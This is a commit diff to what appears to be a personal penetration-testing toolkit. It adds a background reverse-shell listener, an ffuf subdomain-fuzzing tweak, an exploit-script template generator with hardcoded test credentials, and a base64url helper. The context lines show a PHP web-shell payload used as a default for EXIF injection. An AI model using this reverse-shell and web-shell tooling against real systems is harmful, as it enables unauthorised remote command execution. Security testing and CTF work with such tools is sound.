new functions

rev_shell.py

@@ -300,6 +300,13 @@ def generate_payload(type, local_address, port, index=None):
 def spawn_listener(port):
     pty.spawn(["nc", "-lvvp", str(port)])
 
+def spawn_background_shell(port):
+    listener = ShellListener("0.0.0.0", port)
+    listener.startBackground()
+    while listener.connection is None:
+        time.sleep(0.5)
+    return listener
+
 def trigger_shell(func, port):
     def _wait_and_exec():
         time.sleep(1.5)

sshserver.py

@@ -66,11 +66,9 @@ class SSHServer:
                     paramiko_connection = ParamikoConnection(self)
                     transport.start_server(server=paramiko_connection)
                     self.transports.append(transport)
-                    # for client_sock in self.client_sockets:
 
                 except BlockingIOError:
                     pass
-                # handle_client(client_socket, client_address)
         finally:
             self.listen_socket.close()
 
@@ -81,7 +79,7 @@ class SSHServer:
 
     def close(self):
         if self.listen_socket:
-            self.listen_socket.close()
+            self.listen_socket.shutdown(socket.SHUT_RDWR)
         for sock in self.client_sockets:
             sock.close()
 

subdomainFuzz.sh

@@ -32,6 +32,6 @@ charcountNonExistent=$(curl -s "${PROTOCOL}://$(uuidgen).${DOMAIN}" -k -m 5 | wc
 echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
 echo "[ ] Fuzzing…"
 
-ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
+(set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
   -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
-  -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}"
+  -u "${PROTOCOL}://${IP_ADDRESS}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")

template.py

@@ -2,26 +2,21 @@
 
 import sys
 
-def generateTemplate(baseUrl):
+def generate_template(base_url, features):
-    template = """#!/usr/bin/env python
 
-import os
+    if "proxy" in features or "burp" in features:
-import sys
+        proxy = """
-import json
+    if \"proxy\" not in kwargs:
-import time
+        kwargs[\"proxy\"] = {\"http\":\"http://127.0.0.1:8080\", \"https\":\"http://127.0.0.1:8080\"}
-import base64
+"""
-import requests
+    else:
-import subprocess
+        proxy = ""
-import urllib.parse
-from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver, rev_shell
 
-from urllib3.exceptions import InsecureRequestWarning
+    variables = {
-requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+        "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
+    }
 
-BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+    request_method = f"""def request(method, uri, **kwargs):
-
-def request(method, uri, **kwargs):
     if not uri.startswith("/") and uri != "":
         uri = "/" + uri
 
@@ -35,24 +30,78 @@ def request(method, uri, **kwargs):
     
     if "verify" not in kwargs:
         kwargs["verify"] = False
-
+    {proxy}
     return client.request(method, BASE_URL + uri, **kwargs)
+"""
 
+    methods = [request_method]
+
+    if "login" in features or "account" in features:
+        variables["USERNAME"] = '"Blindhero"'
+        variables["PASSWORD"] = '"test1234"'
+        methods.append("""
+def login(username, password):
+    session = requests.Session()
+    res = request("POST", "/login", data={"username": username, "password": password}, session=session)
+    if res.status_code != 200:
+        print("[-] Error logging in")
+        exit()
+    
+    return session
+""")
+
+    if "register" in features or "account" in features:
+        variables["USERNAME"] = '"Blindhero"'
+        variables["PASSWORD"] = '"test1234"'
+        methods.append("""
+def register(username, password):
+    res = request("POST", "/register", data={"username": username, "password": password})
+    if res.status_code != 200:
+        print("[-] Error registering")
+        exit()
+    
+    return True
+""")
+
+    main = """
 if __name__ == "__main__":
     pass
-""" % baseUrl
+"""
 
-    return template
+    variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
+    header = f"""#!/usr/bin/env python
+
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, fileserver, rev_shell
+
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+{variables}
+
+"""
+
+    return header + "".join(methods) + main
 
 if __name__ == "__main__":
 
     if len(sys.argv) < 2:
-        print("Usage: %s <URL>" % sys.argv[0])
+        print("Usage: %s <URL> [features]" % sys.argv[0])
         exit()
 
     url = sys.argv[1]
     if "://" not in url:
         url = "http://" + url
 
-    template = generateTemplate(url)
+    features = [] if len(sys.argv) < 3 else sys.argv[2].split(",")
+    template = generate_template(url, features)
     print(template)

util.py

@@ -3,6 +3,7 @@
 import random
 import math
 import socket
+import base64
 import itertools
 import netifaces as ni
 import string
@@ -209,6 +210,9 @@ def xor(a, b):
 
     return b"".join([bytes([c1 ^ c2]) for (c1,c2) in zip(a, b) ])
 
+def base64urldecode(data):
+    return base64.urlsafe_b64decode(data + b'=' * (4 - len(data) % 4))
+
 def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None):
     import exif